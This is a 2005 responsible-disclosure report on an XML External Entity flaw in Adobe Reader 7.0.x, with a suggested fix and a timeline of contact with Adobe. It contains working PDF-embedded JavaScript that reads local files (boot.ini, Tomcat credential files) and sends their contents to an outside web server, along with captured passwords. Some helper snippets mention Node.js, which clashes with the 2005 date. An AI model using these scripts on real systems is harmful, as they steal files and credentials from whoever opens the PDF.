Adobe Reader XML External Entity Attack

  Sverre H. Huseby
  2005-04-15

Note: This is the text I sent to Adobe to describe the issue. The problem has been fixed in Adobe Reader version 7.0.2.

It appears that the XML parser in Adobe Reader can be tricked into reading certain types of local files and passing them on to other sites. At least it worked with my Adobe Reader 7.0.1 running on Windows XP SP2, and my Adobe Reader 7.0 running on Debian GNU/Linux. A friend of mine confirms that it also works on Mac OS X running Adobe Reader 7.0.

Recent versions of Adobe Reader allow JavaScript to be embedded in PDF documents, and such scripts may work with XML documents. XML documents may reference External Entities through URIs, and most XML parsers, including the one used in Adobe Reader, will allow access to any URI for External Entities, including local files, unless told to do otherwise. To my knowledge, the general "XML External Entity Attack" was first described by Gregory Steuck in a post to Bugtraq in 2002.

The following example XML document will make an XML parser read c:\boot.ini and expand it into the content of the foo tag:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "c:/boot.ini">
]>
<foo>&xxe;</foo>

Note how the ENTITY definition creates the xxe entity, and how this entity is referenced in the final line. The textual content of the foo tag will be the content of c:\boot.ini, and a JavaScript accessing the DOM will be able to extract it.

Note: The attack is limited to files containing text that the XML parser will allow at the place the External Entity is referenced. Files containing non-printable characters, and files with randomly located less-than signs or ampersands, cannot be included. This restriction greatly limits the number of possible target files.
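The restriction can be approximated with a small check. The following is a rough sketch only: isPlainTextIncludable is a hypothetical helper, not part of Adobe Reader's JavaScript API or of the original report. It covers the plain-text case only, so it will reject well-formed XML files even though those can be included, and it ignores character encoding issues.

```javascript
// Hypothetical helper (an assumption for illustration, not an Adobe API).
// Returns true when `text` is plain character data that an XML 1.0 parser
// should accept where an external entity is expanded inside an element.
function isPlainTextIncludable(text) {
    // Control characters other than tab, LF and CR are not legal in XML 1.0,
    // and neither are U+FFFE and U+FFFF.
    var hasIllegalChar =
        /[\u0000-\u0008\u000B\u000C\u000E-\u001F\uFFFE\uFFFF]/.test(text);
    // "<" starts markup and "&" starts a reference, so stray ones break
    // parsing; "]]>" may not appear in character data either.
    var hasMarkupChar = /[<&]/.test(text) || text.indexOf("]]>") !== -1;
    return !hasIllegalChar && !hasMarkupChar;
}
```

A file such as boot.ini, which holds only printable text and line breaks, passes this check, while a file with a NUL byte or a stray less-than sign does not.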

The following Adobe Reader-targeted JavaScript contains the above XML, instructs the Adobe Reader XML parser to parse it, and passes the expanded External Entity (i.e. the content of c:\boot.ini) to a remote web server using the system web browser:

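// XML document whose xxe entity points at the local file to read.
var xml="<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY> "
       + "<!ENTITY xxe SYSTEM \"c:/boot.ini\"> ]><foo>&xxe;</foo>";
// Parsing expands the entity, so the file content ends up inside <foo>.
var xdoc = XMLData.parse(xml, false);
// Hand the expanded content to the remote script via the system web browser.
app.launchURL("http://shh.thathost.com/secdemo/show.php?"
              + "head=Your+boot.ini&text="
              + escape(xdoc.foo.value));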

The remote web server URL points to a script that just displays whatever is sent to it. (Please realize that even if the content of c:\boot.ini is displayed in the local web browser, it has taken a trip to the remote web server before being displayed locally.) With my setup, the web page included the following:
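To make that round trip concrete, here is a minimal sketch of how text is packed into the query string and what a receiving script would get back after decoding. The function names and the example.invalid host are assumptions for illustration; the real show.php script is not shown in this report. The sketch uses encodeURIComponent rather than escape(), and the URL class as found in browsers and Node.js, not in Adobe Reader.

```javascript
// Hypothetical helpers for illustration; neither exists in Adobe Reader.

// Pack a heading and a text body into a query string on `base`.
function buildReportUrl(base, head, text) {
    return base + "?head=" + encodeURIComponent(head)
                + "&text=" + encodeURIComponent(text);
}

// Decode the two parameters the way a receiving script would see them.
function decodeReport(url) {
    var params = new URL(url).searchParams;
    return { head: params.get("head"), text: params.get("text") };
}

var sample = "[boot loader]\r\ntimeout=30\r\n";
var url = buildReportUrl("http://example.invalid/show.php",
                         "Your boot.ini", sample);
var received = decodeReport(url);
```

Here received.text is identical to sample, line breaks included, which is why the remote server ends up with an exact copy of the file. One difference worth knowing: escape() leaves plus signs unencoded, and many query-string decoders turn a plus sign into a space, so encodeURIComponent is the safer choice for an exact copy.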

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /NoExecute=OptIn

One can clearly see that the web server got a copy of c:\boot.ini from the local computer. If you want to test, download the PDF file containing the script (created using Scribus), and move the mouse into the empty text field. The script is triggered when the mouse pointer enters the field. A similar PDF fetching the file /etc/passwd is also available, for testing on Unix-like systems.

As stated above, the XML parser is rather picky when it comes to the contents of the included file. But it has no problems if the file contains XML, which an increasing number of files appear to do these days.

New example: Apache Tomcat stores user names and (clear-text, shame on them!) passwords in a file called tomcat-users.xml. The following PDF-embedded JavaScript looks for this file in several plausible locations and, if it is found, extracts all interesting attributes from the included XML and passes them on to the above-mentioned web site:

function load(uri) {
    try {
        var xml="<?xml version=\"1.0\"?><!DOCTYPE foo [ <!ELEMENT foo ANY> "
           + "<!ENTITY xxe SYSTEM "
           + "\"" + uri + "\"> ]><foo>&xxe;</foo>";
        return XMLData.parse(xml, false);
    } catch (e) {
        console.println(e);
        return null;
    }
}

function attempt(uri) {
    var xdoc = load(uri);
    if (xdoc == null)
        return false;
    try {
        var users = XMLData.applyXPath(xdoc,
                                       "//foo/tomcat-users/user/attribute::*");
        var s = "match: " + uri + "\n";
        for (var q = 0; q < users.length; q++)
            s += users.item(q).name + "=" + users.item(q).value + "     ";
        app.launchURL("http://shh.thathost.com/secdemo/show.php?"
                      + "head=tomcat-users&text=" + escape(s));
        return true;
    } catch (e) {
        console.println(e);
    }
    return false;
}

var uris = [
    "file:///C:/PROGRA~1/APACHE~1/TOMCAT~1.5/conf/tomcat-users.xml",
    "file:///C:/PROGRA~1/APACHE~1/TOMCAT~1.4/conf/tomcat-users.xml",
    "file:///C:/PROGRA~1/APACHE~2/TOMCAT~1.5/conf/tomcat-users.xml",
    "file:///C:/PROGRA~1/APACHE~2/TOMCAT~1.4/conf/tomcat-users.xml"
];

for (var q = 0; q < uris.length; q++)
    if (attempt(uris[q]))
        break;

When executed on my Windows XP, which happens to have Tomcat 5.5 installed in the default location, the web server script displays the following:

match: file:///C:/PROGRA~1/APACHE~2/TOMCAT~1.5/conf/tomcat-users.xml
name=admin password=foobar roles=admin,manager name=tomcat password=tomcat roles=tomcat name=role1 password=tomcat roles=role1 name=both password=tomcat roles=tomcat,role1

So, the administrator password is "foobar". A PDF file containing the script is also available.

I've also used the attack to get access to the private keys of OpenSSH, and the list of scrambled passwords from CVS. The latter is not always successful, as CVS may use less-than or greater-than signs during password scrambling. Both OpenSSH and CVS store their secret files in predictable locations.

Solution

Adobe should make sure the XML parser does not follow URIs to External Entities, or that it follows only known-good (whitelisted) URIs. I do not know which XML parser Adobe Reader uses, but with other parsers one may install a custom-made entity resolver and have it control the inclusion of each URI. With some parsers one can instead just call setExpandEntityReferences(false), but note that this doesn't do what you would expect in some of the XML parsers out there. Testing will be needed.
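The entity resolver idea can be sketched as follows. This is an illustration under stated assumptions, not a description of how Adobe Reader or any particular parser works: makeEntityResolver, the fetchEntity callback and the example.com URI are all hypothetical, and a real parser will have its own hook for plugging in such a resolver.

```javascript
// Hypothetical allow-list resolver (an assumption for illustration only).
// `allowList` holds the exact system identifiers that may be included;
// `fetchEntity` is a caller-supplied function that loads an allowed URI.
function makeEntityResolver(allowList, fetchEntity) {
    return function resolveEntity(systemId) {
        // Exact string comparison: no prefix matching and no path
        // normalization, so "c:/boot.ini" or "file:///etc/passwd"
        // can never slip through.
        if (allowList.indexOf(systemId) === -1) {
            return "";  // refuse by substituting empty replacement text
        }
        return fetchEntity(systemId);
    };
}

var resolver = makeEntityResolver(
    ["http://example.com/dtd/allowed.ent"],        // hypothetical URI
    function (uri) { return "<!-- loaded " + uri + " -->"; });
```

With this resolver, a request for c:/boot.ini yields an empty string and the fetch function is never called, while the one listed URI is loaded as usual. Returning empty text instead of raising an error keeps documents parseable; raising an error is an equally reasonable choice.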

I would also suggest that Adobe make it easier to fully disable the use of JavaScript in Adobe Reader. If JavaScript has been disabled, the Reader will currently ask if it should be re-enabled each time the program is exited.

Notification Tracking

2005-04-15: Adobe notified. (At least I think so. The "Thank you"-page that should have been produced by the vulnerability reporting form was not available ("page not found"), but it appears that the form was posted.)

2005-04-18: Three days with no reply, and no visits from Adobe in my web server log. I tried reporting the "page not found" using a generic feedback form, but was greeted with another "page not found". I then sent an E-mail to otinfo_AT_adobe.com, the only E-mail address I found on Adobe's web pages.

2005-04-19: Reply from otinfo_AT_adobe.com that I should try [CENSORED1]_AT_adobe.com. So I sent an E-mail to them as well. Still no trace in my web server logs that anyone but a few trusted testing friends has seen this page. Later the same day, I contacted CERT in the hope that they would be able to get in touch with Adobe.

2005-04-20: Reply from Adobe's Product Security Incident Response Team (PSIRT) that they are looking into it.

2005-05-09: I sent an E-mail to Adobe's PSIRT asking for the current status.

2005-05-10: E-mail from Adobe that they're working on a fix.

2005-06-15: Adobe releases the fixed version 7.0.2 for Windows, and publishes an advisory on the issue.